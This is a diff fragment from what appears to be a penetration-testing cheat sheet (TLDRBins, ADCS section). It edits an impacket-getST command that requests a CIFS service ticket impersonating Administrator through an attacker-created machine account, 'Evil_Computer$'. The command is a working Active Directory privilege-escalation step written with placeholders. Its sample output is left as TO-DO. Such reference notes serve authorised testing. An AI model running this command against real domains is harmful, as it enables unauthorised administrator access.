TLDRBins TLDRBins / ADCS

 2. Request a Service Ticket

-sudo ntpdate -s <DC> && python3 impacket-getST -spn 'cifs/<TARGET_DOMAIN>' -impersonate Administrator '<DOMAIN>/Evil_Computer$:<GENERATED_PASSWORD>'
+sudo ntpdate -s <DC_IP> && python3 impacket-getST -spn 'cifs/<TARGET_DOMAIN>' -impersonate Administrator '<DOMAIN>/Evil_Computer$:<GENERATED_PASSWORD>'

 Sample Output: TO-DO